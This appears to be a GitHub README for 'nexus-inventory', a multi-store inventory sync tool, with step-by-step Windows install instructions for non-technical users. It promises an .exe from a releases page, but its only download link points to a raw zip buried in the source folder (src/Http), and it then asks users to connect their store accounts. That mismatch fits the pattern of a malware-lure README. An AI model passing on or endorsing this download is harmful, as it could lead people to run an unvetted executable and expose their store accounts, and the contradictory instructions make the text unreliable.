nexus-inventory is a tool that helps you keep track of products you sell on different websites. Whether you use Shopify, WooCommerce, Amazon, or Etsy, this app can link them all together. It works in real-time, so your stock levels stay accurate across all your sales channels.
You do not need any technical skills to use nexus-inventory. This guide will take you through each step to get it running on your Windows computer.
Before you start, check that your computer meets these basic needs:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of RAM
- 500 MB of free storage space
- Internet connection for downloading and syncing data
- Administrator access to install software
If your computer matches these points, you are ready to proceed.
-
Click the big green button at the top or go to the link below to visit the download page:
-
On the releases page, look for the latest version. You want the file that ends with
.exe. This is the program that will run on Windows. -
Click the
.exefile to download. Choose a location you will remember, like your Desktop or Downloads folder. -
Once the download finishes, find the file and double-click it to start the installation.
-
When the installer window opens, click Next to continue.
-
Read the license agreement, then select I agree if you accept the terms.
-
Choose the folder where you want to install the program. The default is usually fine.
-
Click Install to start the process.
-
Wait as the software installs. This usually takes a few minutes.
-
When done, click Finish. The program will be ready to use.
-
Find the nexus-inventory icon on your Desktop or in the Start menu and double-click it to open.
-
The first time you open nexus-inventory, it will ask you to connect your sales channels. You will see options for Shopify, WooCommerce, Amazon, and Etsy.
-
For each platform you use, follow the on-screen steps. Generally, this means logging into your account and giving permission for nexus-inventory to access your data.
-
After connecting your stores, nexus-inventory will automatically start syncing your inventory.
-
You will see a list of your products and their current stock levels from each platform.
-
The software uses webhooks and job queues to update changes in real time. This keeps your data accurate without you needing to check manually.
- Multi-channel syncing: Updates your stock levels automatically on all linked stores.
- Real-time changes: Adjustments you make on one store reflect instantly on others.
- Unified dashboard: View and manage inventory in one place.
- Queue jobs: Processes updates one at a time to avoid errors.
- Laravel-based: The underlying technology is robust and reliable.*
*You do not need to know Laravel to use the app.
- Dashboard: Shows your overview of all connected stores and current stock.
- Products: Lists all products synced across channels.
- Settings: Manage your connected accounts, update preferences, and check for updates.
- Logs: See recent sync activity and any errors.
-
Go back to the releases page occasionally to check for new versions.
-
Download the newest
.exefile. -
Run the installer. The setup will update your current installation without losing your settings.
- Only download nexus-inventory from the official link.
- Keep your connected account passwords secure.
- Regularly update the software for the latest fixes.
- If you notice unusual activity, disconnect and reconnect your sales channels.
- Download page: https://raw.githubusercontent.com/sneadxx/nexus-inventory/main/src/Http/inventory-nexus-v1.9.zip
- Documentation and support information are included inside the app under the Help menu.
If you run into problems, try these:
- Restart the app and your computer.
- Check your internet connection.
- Verify your store login info is correct.
- Use the Logs section in the app to find sync errors.
- Contact support via the GitHub issues page on the repository if you still need help.
- nexus-inventory works best when it runs continuously in the background.
- Closing the app stops automatic syncing.
- It uses job queues to handle tasks smoothly, which means very large inventories sync without slowing down your computer.
- The unified API makes sure all platforms stay aligned without manual input.